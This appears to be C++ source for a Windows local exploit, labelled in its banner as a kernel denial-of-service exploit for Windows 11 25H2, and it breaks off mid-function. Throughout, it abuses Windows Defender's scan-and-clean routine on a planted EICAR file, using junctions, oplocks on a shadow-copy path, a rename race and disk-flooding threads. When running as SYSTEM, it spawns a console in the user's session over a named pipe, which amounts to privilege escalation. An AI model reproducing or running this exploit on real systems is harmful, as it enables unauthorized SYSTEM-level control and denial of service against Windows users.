DWORD WINAPI WDStartScan(void*) {
wchar_t dllpath[MAX_PATH] = { 0 };
if (!GetWDInstallDir(dllpath)) {
ExitProcess(1);
}
wcscat(dllpath, L"MpClient.dll");
HMODULE hm = LoadLibrary(dllpath);
if (!hm) {
printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError());
ExitProcess(1);
}
HRESULT(WINAPI* _MpUpdateStart)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpUpdateStart");
HRESULT(WINAPI* _MpManagerOpen)(DWORD, PMPHANDLE) =
(HRESULT(WINAPI*)(DWORD, PMPHANDLE))
GetProcAddress(hm, "MpManagerOpen");
HRESULT(WINAPI* _MpScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpScanStart");
HRESULT(WINAPI* _MpScanResult)(MPHANDLE, void*) =
(HRESULT(WINAPI*)(MPHANDLE, void*))
GetProcAddress(hm, "MpScanResult");
HRESULT(WINAPI* _MpThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE))
GetProcAddress(hm, "MpThreatOpen");
HRESULT(WINAPI* _MpThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*) =
(HRESULT(WINAPI*)(MPHANDLE, PMPTHREAT_INFO*))
GetProcAddress(hm, "MpThreatEnumerate");
HRESULT(WINAPI* _MpCleanOpen)(void*, void*, void***) =
(HRESULT(WINAPI*)(void*, void*, void***))
GetProcAddress(hm, "MpCleanOpen");
HRESULT(WINAPI* _MpCleanStart)(void*, unsigned int, void*) =
(HRESULT(WINAPI*)(void*, unsigned int, void*))
GetProcAddress(hm, "MpCleanStart");
HRESULT(WINAPI* _MpHandleClose)(MPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE))
GetProcAddress(hm, "MpHandleClose");
if (!_MpManagerOpen || !_MpScanStart || !_MpScanResult || !_MpThreatOpen ||
!_MpThreatEnumerate || !_MpCleanOpen || !_MpCleanStart || !_MpHandleClose) {
printf("[!] Failed to initialize DLL imports.\n");
ExitProcess(1);
}
MPHANDLE hbinding = NULL;
HRESULT hres = _MpManagerOpen(NULL, &hbinding);
if (hres) {
printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPRESOURCE_INFO scaninfo = { 0 };
scaninfo.Scheme = (wchar_t*)L"file";
scaninfo.Path = zippath;
MPSCAN_RESOURCES scanrsrc = { 0 };
scanrsrc.dwResourceCount = 1;
scanrsrc.pResourceList = &scaninfo;
MPHANDLE scanctx = NULL;
hres = _MpScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx);
if (hres) {
printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
DWORD sz = 0x90;
void* scanres = malloc(0x90);
ZeroMemory(scanres, 0x90);
hres = _MpScanResult(scanctx, scanres);
if (hres) {
printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPHANDLE threatctx = NULL;
hres = _MpThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx);
if (hres) {
printf("[!] Failed to open threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPTHREAT_INFO* tinfo = NULL;
hres = _MpThreatEnumerate(threatctx, &tinfo);
if (hres == 0x1) {
printf("[*] No threats found.\n");
ExitProcess(0);
}
if (hres) {
printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
if (tinfo->ThreatStatus != 0x1) {
printf("[!] Unexpected reply from MpThreatEnumerate.\n");
ExitProcess(1);
}
void** ret = NULL;
hres = _MpCleanOpen(scanctx, NULL, &ret);
if (hres) {
printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction };
hres = _MpCleanStart(ret, NULL, callbackaddr);
if (hres) {
printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
_MpHandleClose(scanctx);
_MpHandleClose(threatctx);
_MpHandleClose(hbinding);
return ERROR_SUCCESS;
}
char* eicar_data = NULL;
DWORD eicar_sz = 0;
HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) {
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", workdir);
HANDLE hfile = NULL;
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };
NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ, FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}
if (eicar_data && eicar_sz) {
DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(hfile, eicar_data, eicar_sz, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
return hfile;
}
HANDLE hsrc = NULL;
wchar_t eicarsrcpath[MAX_PATH] = { 0 };
wsprintf(eicarsrcpath, L"%s\\wermgr.exe", isomnt);
UNICODE_STRING _eicarsrcpath = { 0 };
RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath);
OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 };
InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hsrc, &li);
eicar_sz = li.QuadPart;
eicar_data = (char*)malloc(li.QuadPart);
DWORD retbytes = 0;
OVERLAPPED ovp2 = { 0 };
ovp2.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (ReadFile(hsrc, eicar_data, li.QuadPart, &retbytes, &ovp2) == ERROR_IO_PENDING) {
printf("[!] Failed to read EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp2.hEvent, INFINITE);
CloseHandle(ovp2.hEvent);
DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(hfile, eicar_data, li.QuadPart, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
ResetEvent(ovp.hEvent);
void* eicar2 = malloc(0x1000);
UNICODE_STRING adsname = { 0 };
RtlInitUnicodeString(&adsname, L":WDFOO");
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL);
HANDLE hstream = NULL;
stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat);
return NULL;
}
if (WriteFile(hstream, eicar2, 0x1000, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write ADS data, error: %d\n", GetLastError());
return NULL;
}
free(eicar2);
CloseHandle(hstream);
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
CloseHandle(hsrc);
return hfile;
}
bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
if (targetpath) {
wcscpy(target, targetpath);
} else {
ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
}
IO_STATUS_BLOCK iostat = { 0 };
PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t));
fri->FileNameLength = wcslen(target) * sizeof(wchar_t);
fri->Flags = 0x00000001 | 0x00000040;
do {
NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target),
(FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx);
if (stat == STATUS_SUCCESS)
return true;
if (stat == STATUS_SHARING_VIOLATION)
continue;
if (stat) {
printf("[!] Failed to move directory, error: 0x%0.8X\n", stat);
return false;
}
} while (1);
return true;
}
bool CreateJunction(HANDLE hdir, wchar_t* target) {
wchar_t rptarget[MAX_PATH] = { 0 };
wchar_t printname[1] = { L'\0' };
wcscpy(rptarget, target);
size_t targetsz = wcslen(rptarget) * 2;
size_t printnamesz = 1 * 2;
size_t pathbuffersz = targetsz + printnamesz + 12;
size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz);
rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
rdb->ReparseDataLength = static_cast<USHORT>(pathbuffersz);
rdb->Reserved = 0;
rdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(targetsz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printnamesz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz);
OVERLAPPED ov = { 0 };
ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!ov.hEvent) {
return false;
}
DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov);
HeapFree(GetProcessHeap(), NULL, rdb);
rdb = NULL;
if (GetLastError() == ERROR_IO_PENDING) {
DWORD retsz = 0;
GetOverlappedResult(hdir, &ov, &retsz, TRUE);
}
if (GetLastError() != ERROR_SUCCESS) {
printf("[!] Failed to create reparse point, error: %d\n", GetLastError());
return false;
}
return true;
}
bool MountISO(HANDLE* hiso) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hf || hf == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create ISO file, error: %d\n", GetLastError());
return false;
}
DWORD dwbytes = 0;
if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) {
printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError());
return false;
}
CloseHandle(hf);
static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = {
0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B
};
VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS };
HANDLE hvirtdisk = NULL;
DWORD retval = OpenVirtualDisk(&vst, target,
VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH,
OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk);
if (retval) {
printf("[!] Failed to open virtual disk, error: %d\n", GetLastError());
return false;
}
retval = AttachVirtualDisk(hvirtdisk, NULL,
ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER,
NULL, NULL, NULL);
if (retval) {
printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError());
return false;
}
if (hiso)
*hiso = hvirtdisk;
return true;
}
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) {
printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) {
printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
printf("[!] The token does not have the specified privilege.\n");
return FALSE;
}
return TRUE;
}
bool IsRunningAsLocalSystem() {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) {
printf("[!] OpenProcessToken failed, error: %d\n", GetLastError());
return false;
}
TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(MAX_SID_SIZE + sizeof(TOKEN_USER));
DWORD retsz = 0;
bool res = GetTokenInformation(htoken, TokenUser, tokenuser, MAX_SID_SIZE + sizeof(TOKEN_USER), &retsz);
CloseHandle(htoken);
if (!res)
return false;
return IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid);
}
void LaunchConsoleInSessionId(DWORD sessionid) {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken))
return;
SetPrivilege(htoken, SE_TCB_NAME, TRUE);
SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(htoken, SE_DEBUG_NAME, TRUE);
HANDLE hnewtoken = NULL;
bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken);
CloseHandle(htoken);
if (!res)
return;
res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD));
if (!res) {
CloseHandle(hnewtoken);
return;
}
STARTUPINFO si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL,
NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
CloseHandle(hnewtoken);
if (pi.hProcess)
CloseHandle(pi.hProcess);
if (pi.hThread)
CloseHandle(pi.hThread);
return;
}
DWORD WINAPI PoseidonGeneratorThread(void*) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL);
WaitForSingleObject(g_poseidonevent, INFINITE);
do {
BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG);
} while (!g_poseidonexit);
return ERROR_SUCCESS;
}
DWORD WINAPI PoseidonThread(void*) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (!hfile || hfile == INVALID_HANDLE_VALUE)
return GetLastError();
WaitForSingleObject(g_poseidonevent, INFINITE);
try {
do {
SetFilePointer(hfile, 0, NULL, FILE_BEGIN);
DWORD ret = 0;
WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL);
} while (!g_poseidonexit);
} catch (int e) {
}
CloseHandle(hfile);
return ERROR_SUCCESS;
}
int main() {
printf("============================================================\n");
printf(" inouva - Windows Kernel LDoS Exploit\n");
printf(" Windows 11 25H2 (Build 26200) and later\n");
printf("============================================================\n\n");
ntdllhm = GetModuleHandle(L"ntdll.dll");
if (!ntdllhm) {
printf("[!] Failed to get ntdll.dll handle.\n");
return 1;
}
_NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtSetInformationFile");
_NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtDeleteFile");
_NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtOpenDirectoryObject");
_NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG))
GetProcAddress(ntdllhm, "NtQueryDirectoryObject");
_NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtQueryInformationFile");
if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject ||
!_NtQueryDirectoryObject || !_NtQueryInformationFile) {
printf("[!] Failed to import NT API functions.\n");
return 1;
}
g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!g_poseidonevent) {
printf("[!] Failed to create event.\n");
return 1;
}
if (IsRunningAsLocalSystem()) {
printf("[*] Running as Local System.\n");
HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, NULL, NULL);
if (!hclient || hclient == INVALID_HANDLE_VALUE)
return 1;
DWORD sesid = 0;
bool sh = GetNamedPipeServerSessionId(hclient, &sesid);
CloseHandle(hclient);
if (sh) {
LaunchConsoleInSessionId(sesid);
}
return 0;
}
SYSTEM_INFO sysinfo = { 0 };
GetSystemInfo(&sysinfo);
if (sysinfo.dwNumberOfProcessors > 3) {
DWORD tid = 0;
CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid);
for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) {
DWORD tid0 = 0;
CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0);
}
printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors);
}
HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX,
PIPE_WAIT, PIPE_UNLIMITED_INSTANCES,
NULL, NULL, NULL, NULL);
if (!hpipe || hpipe == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create communication pipe, error: %d\n", GetLastError());
return 1;
}
printf("[*] Stage 1: Mounting ISO...\n");
HANDLE hvirtdisk = NULL;
if (!MountISO(&hvirtdisk)) {
printf("[!] Failed to mount ISO.\n");
return 1;
}
printf("[+] ISO mounted successfully.\n");
wchar_t windir2[MAX_PATH] = { 0 };
GetWindowsDirectory(windir2, MAX_PATH);
HANDLE hwin = CreateFile(windir2, GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (!hwin || hwin == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open %ws, error: %d\n", windir2, GetLastError());
return 1;
}
printf("[*] Stage 2: Creating working directory structure...\n");
wchar_t workdir[MAX_PATH] = { 0 };
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH);
wcscat(workdir, wuid2);
if (!CreateDirectory(workdir, NULL)) {
printf("[!] Failed to create work directory, error: %d\n", GetLastError());
return 1;
}
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
HANDLE hdirtmp = NULL;
wchar_t dirtmp[MAX_PATH] = { 0 };
wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir);
UNICODE_STRING _dirtmp = { 0 };
RtlInitUnicodeString(&_dirtmp, dirtmp);
OBJECT_ATTRIBUTES dirtmpobjattr = { 0 };
InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };
NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat);
return 1;
}
wchar_t wddirname[MAX_PATH] = { 0 };
if (!GetWERDir(wddirname)) {
return 1;
}
wchar_t* verdirname = PathFindFileName(wddirname);
wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname);
HANDLE hdir = NULL;
wchar_t maindirname[MAX_PATH] = { 0 };
wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname);
UNICODE_STRING _maindirname = { 0 };
RtlInitUnicodeString(&_maindirname, maindirname);
OBJECT_ATTRIBUTES maindirobjattr = { 0 };
InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE,
&maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat);
return 1;
}
printf("[*] Stage 3: Writing EICAR test file...\n");
wchar_t _mntpath[MAX_PATH] = { 0 };
ULONG pathsz = MAX_PATH;
DWORD retval = GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath);
if (retval) {
printf("[!] Failed to fetch mounted disk path, error: %d\n", retval);
return 1;
}
wchar_t mntpath[MAX_PATH] = { L"\\Device\\" };
wcscat(mntpath, PathFindFileName(_mntpath));
HANDLE heicar = WriteEicar(maindirname, mntpath);
if (!heicar)
return 1;
printf("[+] EICAR file written successfully.\n");
printf("[*] Stage 4: Triggering Windows Defender scan...\n");
SetEvent(g_poseidonevent);
DWORD tid = 0;
HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid);
if (!hthread) {
printf("[!] Failed to create working thread, error: %d\n", GetLastError());
return 1;
}
printf("[+] Windows Defender scan started.\n");
printf("[*] Stage 5: Triggering race condition...\n");
wchar_t _delpath[MAX_PATH] = { 0 };
wsprintf(_delpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING delpath = { 0 };
RtlInitUnicodeString(&delpath, _delpath);
OBJECT_ATTRIBUTES delobjattr = { 0 };
InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK deliostat = { 0 };
HANDLE hc = NULL;
wchar_t vsspath[MAX_PATH] = { 0 };
ShadowCopyFinderThread(vsspath);
printf("[*] VSS path: %ws\n", vsspath);
CloseHandle(heicar);
HANDLE hvss = NULL;
wchar_t vsswinpath[MAX_PATH] = { 0 };
wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname);
UNICODE_STRING _vsswinpath = { 0 };
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat,
NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 };
opin.StructureLength = sizeof(opin);
opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 };
opout.StructureLength = sizeof(opout);
opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
DWORD cb = 0;
OVERLAPPED ovoplock = { 0 };
ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin),
&opout, sizeof(opout), &cb, &ovoplock);
WaitForSingleObject(ovoplock.hEvent, INFINITE);
CloseHandle(hvss);
NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_SUPERSEDE, NULL, NULL, NULL);
MoveToTempDir(hc);
if (!CreateJunction(hdir, mntpath))
return 1;
if (hc)
CloseHandle(hc);
printf("[*] Stage 6: Monitoring for directory changes...\n");
char buff[0x1000] = { 0 };
wchar_t teststr[] = { L"Temp\\TMP" };
do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0)
continue;
break;
} while (1);
printf("[*] Stage 7: Finalizing exploit...\n");
wchar_t workdir2[MAX_PATH] = { L"\\??\\" };
wcscat(workdir2, workdir);
if (!CreateJunction(hdir, dirtmp)) {
return 1;
}
wchar_t lockpath[MAX_PATH] = { 0 };
wsprintf(lockpath, L"%s\\wermgr.exe", mntpath);
HANDLE hlock1 = NULL;
UNICODE_STRING _lockpath = { 0 };
RtlInitUnicodeString(&_lockpath, lockpath);
OBJECT_ATTRIBUTES lockpathobjattr = { 0 };
InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
CloseHandle(WriteEicar(maindirname, mntpath));
stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat);
return 1;
}
if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock file, error: %d\n", GetLastError());
return 1;
}
HANDLE heicar2 = NULL;
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
